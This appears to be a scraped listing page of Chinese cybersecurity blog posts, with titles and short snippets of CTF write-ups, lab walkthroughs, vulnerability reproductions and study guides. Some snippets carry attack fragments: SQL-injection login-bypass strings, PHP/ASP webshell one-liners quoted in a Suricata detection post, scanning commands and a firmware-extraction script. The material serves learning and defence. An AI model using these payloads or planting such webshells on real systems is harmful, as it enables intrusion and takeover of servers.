1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

sqli-labs靶场详解（less29-less31）

less-29 提示有最好的防火墙小白原因这种题型没见过先自己测试一下 ?id1 to use near 1 预计可以使用报错注入和单引号有关的注入点 ?id1 and 11 成功 ?id1 and 12 失败确实是单引号字符型注入点 ?id1;%00 id1%27;%00 获取到了%00空字符（原因就是服务器获取…

【精选】VulnHub red 超详细过程思路

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【java】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 …

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C卷

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C卷 2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C卷A模块基础设施设置/安全加固（200分）A-1：登录安全加固（Windows, Linux）A-2&#…

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B卷

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B卷 2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B卷A模块基础设施设置/安全加固（200分）A-1：登录安全加固（Windows, Linux）A-2&#…

sql 注入 ctf wiki

部分转载ctf-wiki 判闭合形式： 哪个报错就是哪种 1,1’,1’‘,1’,1’（双引号带括号） 万能密码： admin’ – admin’ # admin’/* ’ or 11– ’ or 11# ’ or 11/* ) or ‘1’1– ) or (‘1’1– 数据库名： SEL…

网络安全（黑客）—高效自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

服务器端请求伪造（SSRF）

概念 SSRF(Server-Side Request Forgery，服务器端请求伪造) 是一种由攻击者构造形成的由服务端发起请求的一个安全漏洞。一般情况下，SSRF是要攻击目标网站的内部系统。（因为内部系统无法从外网访问，所以要把目标网站当做中间人来…

2023年中职“网络安全“—Web 渗透测试②

2023年中职“网络安全“—Web 渗透测试② Web 渗透测试任务环境说明：1.访问http://靶机IP/web1/,获取flag值，Flag格式为flag{xxx}；2.访问http://靶机IP/web2/,获取flag值，Flag格式为flag{xxx}；3.访问http://靶机IP/web…

OSI参考模型

目录一. OSI参考模型的各层功能二. 网络排错三. 网络安全四. 实体、协议、服务和服务访问点SAP五. TCP IP体系结构一. OSI参考模型的各层功能 \quad \quad \quad \quad 我们首先来看应用层实现的功能每个字段的各种取值所代表的意思 \quad \quad 比如要保存的文件内容是ab…

【ATTCK】MITRE Caldera-路径发现插件

CALDERA是一个由python语言编写的红蓝对抗工具（攻击模拟工具）。它是MITRE公司发起的一个研究项目，该工具的攻击流程是建立在ATT&CK攻击行为模型和知识库之上的，能够较真实地APT攻击行为模式。通过CALDERA工具，安全…

2024年山东省职业院校技能大赛中职组“网络安全”赛项竞赛试题-B

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B 一、竞赛时间总计：360分钟二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值 A、B模块 A-1 登录安全加固 180分钟 200分 A-2 本地安全策略设置 A-3 流量完整性保护 A-4 …

SMB信息泄露的利用

一、背景今天分享SMB信息泄露，SMB（Server Message Block）网络通信协议，早些时候被用于Web链接和客户端与服务器之间的信息通信，现在大部分Web页面使用HTTP协议，在web领域应用较少。另一方面SMB协议还是被…

Linux下快速确定目标服务器支持哪些协议和密码套件

实现原理是利用TLS协议的特点和握手过程来进行测试和解析响应来确定目标服务器支持哪些TLS协议和密码套件。在TLS握手过程中，客户端和服务器会协商并使用相同的TLS协议版本和密码套件来进行通信。通过发送特定的握手请求并分析响应，可以确定目标服务器…

高防IP是什么，高防IP有什么作用？

什么是高防IP？ 高防IP是一款专业解决大流量攻击的安全防护产品，支持网站和非网站类业务的DDoS、CC防护，用户通过配置转发规则，将攻击流量引至高防IP并清洗，保障业务稳定可用，具有灾备能力，线路…

2024年山东省职业院校技能大赛中职组“网络安全”赛项竞赛试题-A

2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A 一、竞赛时间总计：360分钟二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值 A、B模块 A-1 登录安全加固 180分钟 200分 A-2 本地安全策略设置 A-3 流量完整性保护 A-4 …

漏洞复现--飞企互联FE业务协作平台ShowImageServlet任意文件读取

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

命令执行无回显的判断方法及dnslog相关例题的讲解

命令无回显的情况

网络安全（黑客）－自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

java继承和重写（代码演示）

java中的继承和重写概念继承在 Java 中，继承是面向对象编程中的重要概念，它允许一个类（称为子类）继承另一个类（称为父类）的属性和方法。子类可以继承父类的非私有属性和方法，并且可以添加…

【Web实战】浅谈reactor netty httpclient请求解析过程

目录 0x00 前言 0x01 "畸形scheme"HTTP请求 0x02 其他 0x00 前言 Reactor Netty HttpClient 是 Reactor Netty 框架提供的一个用于进行异步 HTTP 请求的客户端库。它基于 Reactor 框架，采用响应式编程模型，允许以非阻塞的方式执行 HTTP 请…

CNVD-2023-12632：泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

文章目录泛微E-cology9 browserjsp SQL注入漏洞(CNVD-2023-12632)漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议泛微E-cology9 browserjsp SQL注入漏洞(CNVD-2023-12632)漏洞复现 [附POC] 0x…

低成本打造便携式无线网络攻防学习环境

1.摘要一直以来, 无线网络安全问题与大众的个人隐私息息相关, 例如: 为了节省流量, 连接到一个看似安全的免费WiFi, 在使用过程中泄露自己的各类密码信息甚至银行卡账号密码信息。随着家用智能电器的普及, 家中的各类智能设备连入家里的无线网络, 却突然失灵, 甚至无法正常连…

小程序存在优惠卷遍历，但是歪了

进入小程序，因为是一个小商城，所以照例先查看收货地址是否存在越权，以及能否未授权访问，但是发现不存在这些问题，所以去查看优惠卷进入领券中心，点击领取优惠券时抓包发现数据包，存在敏感参数…

suricata识别菜刀流量

一、捕获菜刀流量 payload特征： PHP: <?php eval($_POST[caidao]);?> ASP: <%eval request(“caidao”)%> ASP.NET: <% Page Language“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>数据包流量特征： …

Me-and-My-Girlfriend-1

Me-and-My-Girlfriend-1 一、主机发现和端口扫描主机发现，靶机地址192.168.80.147 arp-scan -l端口扫描，开放了22、80端口 nmap -A -p- -sV 192.168.80.147二、信息收集访问80端口路径扫描 dirsearch -u "http://192.168.80.147/" -e * …

BUUCTF [ACTF新生赛2020]outguess 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。密文： 下载附件，得到一堆文件。解题思路： 1、根据题目和flag.txt文件提示，猜测为outguess隐写。 outguess下载安装 kail 终端命…

2023 hnust 湖南科技大学信息安全管理课程期中考试复习资料

前言 ※老师没画重点的补充内容★往年试卷中多次出现或老师提过的，很可能考该笔记是奔着及格线去的，不是奔着90由于没有听过课，部分知识点不一定全，答案不一定完全正确题型试卷有很多题是原题判断题（PPT&#xff…

bugkuctf--Crypto--抄错的字符

抄错的字符描　　述: 老师让小明抄写一段话，结果粗心的小明把部分数字抄成了字母，还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗：QWIHBLGZZXJSXZNVBZW 这里其实是base64加密只是更换了字母大写，还有数字 QW…

BUUCTF [GXYCTF2019]gakki 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。密文： 下载附件，解压得到一张.jpg图片。解题思路： 1、放到010 Editor中看一下，找到rar压缩包的文件头。使用Kali中的binwalk工具…

怎样禁止邮件发送涉密信息

数字化时代，电子邮件已成为人们生活和工作中不可或缺的通讯工具。然而，随着互联网的普及，涉密信息的泄露风险也随之增加。为了保护敏感数据，禁止邮件发送涉密信息显得尤为重要。以下是一些建议，帮助你实现这一目标。 1…

大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训

大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训在当今数字化时代，大数据技术的迅猛发展带来了前所未有的数据增长，同时也催生了对数据安全和网络安全的更为迫切的需求。本篇博客将聚焦于大数据技术背景下的数据安全与网络安全&#xff…

网络安全（黑客）—0基础小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

BUUCTF [HBNIS2018]低个头 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。来源： https://github.com/hebtuerror404/CTF_competition_warehouse_2018 密文： 下载附件，得到一个.txt文件。解题思路： 1、低头…

攻防非对称问题｜当前企业面临的网络攻防非对称问题及其解决途径

随着信息技术的不断发展，网络已经成为我们日常生活和商业活动中不可或缺的一部分。然而，随之而来的是网络安全问题的不断升级。网络攻防非对称问题是当前亟待解决的一个复杂而严峻的挑战。其主要的表现是攻击成本远低于防御成本以及相同投入带来的攻击能…

实战|信息泄露

0x01系统初探通过fofa对大学进行搜索 fofa:host"edu.cn" && status_code"200"在随意的翻阅查看时，发现访问xxx.edu.cn登录页面会优先访问登录后的页面，再跳转至登录页面。盲猜应该是前端校验，可以通过…

BUUCTF [SUCTF2018]single dog 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。来源：https://github.com/hebtuerror404/CTF_competition_warehouse_2018 密文： 下载附件，得到一张.jpg图片。解题思路： 1、看了…

青少年CTF之PHP特性练习(1-5)

青少年CTF-PHP特性练习文章目录青少年CTF-PHP特性练习PHP特性01PHP特性02PHP特性03PHP特性04PHP特性05 PHP特性01 看给出的源码，两个变量的值加密后的MD5相同 <?php$s1 "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47…

【黑客】网络安全-小白自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

【网络安全】-常见的网站攻击方式详解

文章目录介绍1. SQL 注入攻击攻击原理攻击目的防范措施 2. 跨站脚本攻击（XSS）攻击原理攻击目的防范措施 3. CSRF 攻击攻击原理攻击目的防范措施 4. 文件上传漏洞攻击原理攻击目的防范措施 5. 点击劫持攻击原理攻击目的防范措施结论介绍在数字时代&a…

为啥网络安全那么缺人，但很多人却找不到工作？

文章目录一、学校的偏向于学术二、学的东西太基础三、不上班行不行为什么网络安全的人才缺口那么大，但是大学毕业能找到网安工作的人却很少，就连招聘都没有其他岗位多？ 明明央视都说了网络安全的人才缺口还有300多万，现在找不到…

【网安AIGC专题】46篇前沿代码大模型论文、24篇论文阅读笔记汇总

网安AIGC专题写在最前面一些碎碎念课程简介 0、课程导论1、应用 - 代码生成2、应用 - 漏洞检测3、应用 - 程序修复4、应用 - 生成测试5、应用 - 其他6、模型介绍7、模型增强8、数据集9、模型安全写在最前面本文为邹德清教授的《网络安全专题》课堂笔记系列的文章&#xff0c…

中间件安全：Weblogic 漏洞.（使用工具可以利用多种类型漏洞）

中间件安全：Weblogic 漏洞.（使用工具可以利用多种类型漏洞） WebLogic 是美国 Oracle 公司出品的一个 application server，确切的说是一个基于 JAVA EE 架构的中间件，WebLogic 是用于开发、集成、部署和管理大型分布式…

网络安全小白自学

一、网络安全应该怎么学？ 1.计算机基础需要过关这一步跟网安关系暂时不大，是进入it行业每个人都必须掌握的基础能力。计算机网络计算机操作系统算法与数据架构数据库 Tips:不用非要钻研至非常精通，可以与学习其他课程同步进行。 2.渗透技…

【CVE-2023-6099】优卡特脸爱云一脸通智慧管理平台权限绕过漏洞（2023年11月发布）

漏洞简介优卡特脸爱云一脸通智慧管理平台/SystemMng.ashx接口处存在权限绕过漏洞，通过输入00操纵参数operatorRole，导致特权管理不当，未经身份认证的攻击者可以通过此漏洞创建超级管理员账户，造成信息泄露和后台接管漏洞等级高…

安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]

文章目录安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC] 0x01 前言免责声明：请勿利…

西工大网络空间安全学院计算机系统基础实验一（9, 10, 11, 12, 13）

还是那句话，专心做好你自己的，老老实实把基础打好，不要被其他人带跑节奏，不要跟他打，跟着这系列博客，稳扎稳打一步一步来。即使你VMware workstation没下载好，即使你Ubuntu虚拟机没配好&#xf…

数据库应用-H2database--未授权访问命令执行漏洞

数据库应用-H2database–未授权访问&命令执行漏洞 Java SQL 数据库 H2,H2的主要特点是：非常快，开源，JDBC API；嵌入式和服务器模式；内存数据库；基于浏览器的控制台应用程序。 H2 数据库控制台中的另一…

P8A012-A016组策略安全

账户策略【预备知识】组策略（Group Policy）是Microsoft Windows系统管理员为用户和计算机定义并控制程序、网络资源及操作系统行为的主要工具。通过使用组策略可以设置各种软件、计算机和用户策略。【实验步骤】网络拓扑：server2008A…

【预计IEEE出版|EI征稿通知】第六届下一代数据驱动网络国际学术会议 (NGDN 2024)

第六届下一代数据驱动网络国际学术会议 (NGDN 2024) The Sixth International Conference on Next Generation Data-driven Networks 2024年4月26-28日 | 中国沈阳基于前几届在英国埃克塞特 (ISPA 2020) 、中国沈阳 (TrustCom 2021) 和中国武汉 (IEEETrustCom-2022) 成功举…

CTF特训日记day2

day2打了一个叫NBCTF的比赛做了四个题，剩下五道arm的题不会做了，关注一下wp，也许可以靠这个比赛提升一波异架构能力。 heapnotes 2.31简单堆题，没啥好说的，直接改got就行了 from re import L from pwn import * f…

P8A009-A011活动目录安全

设置目录数据库访问权限【预备知识】活动目录（Active Directory）是面向Windows Standard Server、Windows Enterprise Server以及 Windows Datacenter Server的目录服务。（Active Directory不能运行在Windows Web Server上，但…

JTag 提取NXP固件脚本示例

本文用Trace32脚本实现固件提取，脚本连接JTAG端口并提取基于NXP芯片的ECU Flash： /SILENT /NOQUIET /OPENDEBUGGER /VERSION /IFCONNECTION JTAG /CPU NXP_ARM ; 如果使用的是NXP ARM芯片，选择正确的CPU类型 /CONNECT /PROTOCOL JTAG…

基于eBPF检测反弹shell 的思路

本文使用C语言编写一个eBPF模块来检测反弹shell，该模块使用Linux内核提供的eBPF（extended Berkeley Packet Filter）功能来实现。eBPF是一种内核级别的安全工具，可以检查和过滤网络流量或其他系统事件。下面是一个简单的示例&#…

文件加密软件排行榜前十名（文档加密管理软件哪个好用）

信息技术的不断发展，文件加密软件已成为企业和个人保护信息安全的重要工具。本文将介绍文件加密软件排行榜前十名，并简单分析哪个好用的文档加密管理软件。 1、域之盾软件--加密系统 1）文件加密：域之盾加密软件可以对电脑中的文件…

VT驱动开发

VT技术(编写一个VT框架) 1.VT技术介绍 1.技术介绍 1.VT技术 VT技术是Intel提供的虚拟化技术，全称为Intel Virtualization Technology。它是一套硬件和软件的解决方案，旨在增强虚拟化环境的性能、可靠性和安全性。VT技术允许在一台物理计算机上同时运…

整车信息安全工作简介

在整车研发生命周期内，信息安全应被视为一个重要的方面，以下是一些实施信息安全的关键措施： 1. 安全风险评估：在整车研发的早期阶段，进行安全风险评估是至关重要的。通过对车辆系统和组件进行安全威胁分析&#xff0c…

什么是跨站脚本攻击

跨站脚本攻击 1. 定义2. 跨站脚本攻击如何工作3. 跨站脚本攻击类型4. 如何防止跨站脚本攻击 1. 定义跨站脚本攻击（Cross-site Scripting，通常称为XSS），是一种典型的Web程序漏洞利用攻击，在线论坛、博客、留言板等共享…

Prime 2.0

信息收集 # Nmap 7.94 scan initiated Thu Nov 23 20:09:06 2023 as: nmap -sn -oN live.nmap 192.168.182.0/24 Nmap scan report for 192.168.182.1 Host is up (0.00018s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.182.2 Host is u…

Prime 1.0

信息收集存活主机探测 arp-scan -l 或者利用nmap nmap -sT --min-rate 10000 192.168.217.133 -oA ./hosts 可以看到存活主机IP地址为：192.168.217.134 端口探测 nmap -sT -p- 192.168.217.134 -oA ./ports UDP端口探测详细服务等信息探测开放端口22&#x…

XSS漏洞原理

XSS漏洞介绍： 跨站脚本攻击XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入We…

整车FOTA实现思路

本文简单介绍整车FOTA（Firmware Over-The-Air）的一般实现方案，可以实现对整车的固件升级和管理： 1. 设计OTA平台建立一个OTA平台，用于管理和分发车辆固件更新。该平台应具备以下功能： - 用户管理&…

Apache HTTPD 2.448 mod_proxy SSRF漏洞（CVE-2021-40438)

任务一： 复现漏洞任务二： 尝试利用SSRF漏洞，访问重庆邮电大学官网（http://www.cqupt.edu.cn) 1.搭建环境 2.了解这个地方是httpd作为了一个反向代理服务器，也就是先是客户端发送请求给代理服务器，然后…

Apache solr XXE 漏洞（CVE-2017-12629）

任务一： 复现环境中的漏洞任务二： 利用XXE漏洞发送HTTP请求，在VPS服务器端接受请求，或收到DNS记录任务三： 利用XXE漏洞读取本地的/etc/passwd文件 1.搭建环境 2.开始看wp的时候没有看懂为什么是core，然…

什么是中间人攻击

中间人攻击 1. 定义2. 中间人攻击如何工作3. 常见中间人攻击类型4. 如何防止中间人攻击 1. 定义中间人攻击（Man-in-the-Middle Attack，简称MITM），是一种会话劫持攻击。攻击者作为中间人，劫持通信双方会话并操纵通信过…

反序列化漏洞详解(三)

目录一、wakeup绕过二、引用三、session反序列化漏洞 3.1 php方式存取session格式 3.2 php_serialize方式存取session格式 3.3 php_binary方式存取session格式 3.4 代码演示 3.5 session例题获取flag 四、phar反序列化漏洞 4.1 phar常识 4.2 代码演示 4.3 phar例…

【漏洞复现】通达OA inc/package/down.php接口存在未授权访问漏洞附POC

漏洞描述通达OA（Office Anywhere网络智能办公系统）是由通达信科科技自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、…

BUUCTF [UTCTF2020]docx 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。密文： 下载附件，得到一个.docx文件。解题思路： 1、打开文件，内容如下，没有flag。使用010 Editor打开.docx文件&…

[GYCTF2020]Blacklist 1详解（handler命令用法!)

题目环境判断注入类型 1 1’ 可知本题是字符型注入查库此题使用堆叠查询 1’;show databases; 查表 1’;show tables; 存在FlagHere数据表极有可能当中存在flag 查字段数 – - 是闭合符 1’ order by 3 – - 1’ order by 2 – - 可知只有两个字段数查FlagHere数据表的字段…

[网鼎杯 2020 青龙组]singal 1

前言在主函数中找到了一个vm的译码器，译码器主要是解释传入的opcode，然后对我们输入的字符操作，这里我们发现他是单字节比较的，方法很多可以使用单字节映射，也可以是使用符号化执行，当然也可以硬着头皮去…

ClassCMS2.4漏洞复现

CMS源码在附件中环境搭建使用phpstudy2016搭建web环境，php版本为5.5 安装CMS 这里选择Mysql数据库进行安装用户名和密码都写默认的admin方便记忆输入完成后点击安装点击安装 CMS的安装过程中有个报错忽略就好，登录不进后台的话刷新一下页面进入了C…

【sqli靶场】第二关和第三关通关思路

目录前言一、sqli靶场第二关 1.1 判断注入类型 1.2 判断数据表中的列数 1.3 使用union联合查询 1.4 使用group_concat()函数 1.5 爆出users表中的列名 1.6 爆出users表中的数据二、sqli靶场第三关 2.1 判断注入类型 2.2 观察报错 2.3 判断数据表中的列数 2.4 使用union联合…

漏洞复现--速达进存销管理系统任意文件上传

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

简单了解传输层协议之TCP和UDP

目录一、什么是端口号? 二、TCP协议 2.1 TCP报文格式 2.2 三次握手 2.3 四次挥手 2.4 窗口流量控制三、UDP协议 3.1 UDP报文格式 3.4 传输过程一、什么是端口号? 我们自己的一台电脑上有时可能会同时运行多个进程软件来进行上网。那么当网络上的服务器响应我们电…

ip限制绕过及gopher对redis的利用讲解

IP绕过添加端口短网址指向任意IP的域名xip.ioIP限制绕过 （1）十进制转换 （2）八进制转换 （3）十六进制转换 （4）不同进制组合转换进制转换 127.0.0.1 Gopher协议 gopher协议是一个互…

BUUCTF-WEB-刷题记录（2）

[网鼎杯 2018]Fakebook 注册一个账户，进去之后查看源代码，感觉存在注入点是数字型注入，payload： 1%20and(false) 1%20and(true)判断列数 1 order by 5改为4的时候则页面正常判断显示位，可以看见第二列存在数据回…

BUU LFI COURSE 1

二打开链接发现有这么一串php代码阅读发现是GET传参，传入的参数是file 传一下试试页面会报错我们知道了他的路径是在/var/www/html/index.php 这个下面然后想办法返回上一级，就是../ 然后尝试传参一个../不够他的父级目录有好几个&#xff0…

网络安全威胁——中间人攻击

中间人攻击 1. 定义2. 中间人攻击如何工作3. 常见中间人攻击类型4. 如何防止中间人攻击 1. 定义中间人攻击（Man-in-the-Middle Attack，简称MITM），是一种会话劫持攻击。攻击者作为中间人，劫持通信双方会话并操纵通信过…

第十六届山东省职业院校技能大赛中职组网络安全赛项竞赛正式试题

第十六届山东省职业院校技能大赛中职组网络安全"赛项竞赛试题一、竞赛时间总计：360分钟二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值A、B模块A-1登录安全加固180分钟200分A-2本地安全策略设置A-3流量完整性保护A-4事件监控A-5服务加固A-6防火墙策…

2024年江苏省职业院校技能大赛信息安全管理与评估第二阶段教师组 (样卷)

2024年江苏省职业院校技能大赛信息安全管理与评估第二阶段教师组 (样卷) 项目竞赛样题本文件为信息安全管理与评估项目竞赛-第二阶段样题，内容包括：网络安全事件响应、数字取证调查、应用程序安全。本次比赛时间为180分钟。介绍 GeekSec专注技能竞…

JWT安全及WebGoat靶场

JWT 安全 cookie(放在浏览器) cookie 是一个非常具体的东西，指的就是浏览器里面能永久存储的一种数据，仅仅是浏览器实现的一种数据存储功能。 cookie 由服务器生成，发送给浏览器，浏览器把 cookie 以 kv 形式保存到某个目录下的…

ARM Cortex-M安全之MPU介绍

ARM Cortex-M处理器系列中的存储保护单元（Memory Protection Unit，简称MPU）是一种硬件机制，可用于在嵌入式系统中实现存储保护和访问权限控制。MPU允许开发人员对不同的内存区域分配不同的权限，从而提供对系统代码和数…

【EI征稿中|ACM出版】2023 人工智能、系统与网络安全国际学术会议 (AISNS 2023）

2023 人工智能、系统与网络安全国际学术会议 (AISNS 2023） 2023 International Conference on Artificial Intelligence, Systems and Network Security 由西南科技大学计算机科学与技术学院主办的2023人工智能、系统与网络安全国际学术会议 (AISNS 2023&#xff…

Atlassian Confluence 模板注入代码执行漏洞风险通告

近期，亚信安全CERT通过监控发现，Atlassian 公司发布了一则安全公告，针对 Confluence 数据中心和 Confluence 服务器存在的远程代码执行漏洞（CVE-2023-22522）进行了修复。该漏洞涉及 Confluence 页面中的模板注入问题&a…

黑客（网络安全）技术自学——高效学习

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

喜讯！云起无垠上榜《成长型初创企业推荐10强》

近期，由中国计算机学会抗恶劣环境计算机专业委员会、信息产业信息安全测评中心和安全牛联合发起的第十一版《中国网络安全企业100强》榜单正式发布。在这份备受关注的榜单中，云起无垠凭借其创新的技术能力，荣登《成长型初创企业推荐10强》榜单…

多个安全厂商设备远程命令执行漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、漏洞描述此漏洞存在多个品牌厂商的安全设备中，受影响…

eve-ng镜像模拟设备-信息安全管理与评估-2023国赛

eve-ng镜像模拟设备-信息安全管理与评估-2023国赛 author：leadlife data：2023/12/4 mains：EVE-ng 模拟器 - 信息安全管理与评估模拟环境部署 references： EVE-ng 官网：https://www.eve-ng.net/EVE-ng 中文网&#xff1…

BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注）

题目环境判断注入类型 1 2 3 1’ 输入1’报错提示bool(false) 可知是字符型的布尔注入（盲注） 尝试万能密码 1’ or ‘1’1 已检测SQL注入猜测某些关键字或者字符被过滤 FUZZ字典爆破可以看到部分关键字被过滤，包括空格 All You Want Is In …

Web信息收集，互联网上的裸奔者

Web信息收集，互联网上的裸奔者 1.资产信息收集2.域名信息收集3.子域名收集4.单点初步信息收集网站指纹识别服务器类型(Linux/Windows)网站容器(Apache/Nginx/Tomcat/IIS)脚本类型(PHP/JSP/ASP/ASPX)数据库类型(MySQL/Oracle/Accees/SqlServer) 5.单点深入信息收集截…

BUU UPLOAD COURSE 1

传一个cmd.php木马文件访问一下这个图片地址发现什么都没有，在hackbar里面连接一下我们的木马然后看到了一些目录然后直接查看flag就出来了这里也可以用蚁剑去连接直接访问地址，拿着地址去连接就行了。

【网络奇缘】- 计算机网络|深入学习物理层|网络安全

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 回顾链接：http://t.csdnimg.cn/ZvPOS 这篇文章是关于深入学习原理参考模型-物理层的相关知识点&…

从一文开始你的你的HTB之旅

简介 2023年12月10日 0:18:34本文用于教程如何开始HTB靶机的练习，关于如何增强连通性，流畅度，以及一些打靶机时，常常会使用的工具说明和小技巧 openvpn 进到这个页面，左边分别有好几个选项 Starting Point &#xf…

中科院分区和JCR分区有什么区别

文章目录名词解释学科划分不同参考的影响因子不同期刊分区不同期刊分区阈值不同名词解释中科院分区：又称“中科院JCR分区”，是中国科学院文献情报中心世界科学前沿分析中心的科学研究成果，期刊分区表数据每年底（每年12月中下旬…

漏洞复现--Apache Ofbiz XML-RPC RCE（CVE-2023-49070）

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

CTF竞赛密码学题目解析

CTF（Capture The Flag）竞赛是一个有趣的挑战。密码学是CTF竞赛中的核心元素之一，通常涉及解密、破译密码、理解加密算法等技能。以下是30个题目及答案，新入行的可以看看鸭。题目及答案 1. Caesar Cipher 描述：给出一…

Hackademic.RTB1

信息收集判断存活主机 nmap -sT --min-rate 10000 192.168.182.0/24Nmap scan report for 192.168.182.135 Host is up (0.030s latency). Not shown: 992 filtered tcp ports (no-response), 6 filtered tcp ports (host-unreach) PORT STATE SERVICE 22/tcp closed ssh …

PETS渗透测试标准流程

PTES组织 PETS渗透测试标准流程原文 http://www.pentest-standard.org/index.php/Main_Page学习一下渗透测试国际规范流程英文不好的师傅可以使用浏览器插件沙拉查词或者整页翻译。浏览器扩展中添加划词翻译非常好用

Web应用安全—信息泄露

从书本和网上了解到Web应用安全的信息泄露的知识，今天跟大家分享点。 robots.txt泄漏敏感信息漏洞描述：搜索引擎可以通过robots文件可以获知哪些页面可以爬取，哪些页面不可以爬取。Robots协议是网站国际互联网界通行的道德规范，其…

vulnhub靶机hacksudo FOG

下载地址：hacksudo: FOG ~ VulnHub 主机发现目标148 端口扫描 IP过多整理一下扫描服务漏洞扫描去80看看经典凯撒，后面还是一个github 好好好，mp4 接下来目录爆破一个一个去看失败了换一个少模块，有点麻烦，直接…

反制cobalt_strike_4.7

反制cobalt_strike_4.7 因为命令控制服务器（C2）在样本中没有隐藏被蓝队人员定位到了。蓝队人员可以爆破红队人员的C2登录口令项目地址： https://github.com/ryanohoro/csbruter #可以不加-p参数默认就是50050端口 python csbruter.py IP…

漏洞复现--用友UFIDA NC未授权访问

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

孩子还是有一颗网安梦——Bandit通关教程：Level 6 → Level 7

🕵️‍♂️ 专栏《解密游戏-Bandit》 🌐 游戏官网： Bandit游戏 🎮 游戏简介： Bandit游戏专为网络安全初学者设计，通过一系列级别挑战玩家，从Level0开始，逐步学习基础命令行和安全概念…

网络安全（黑客）—0基础自学手册

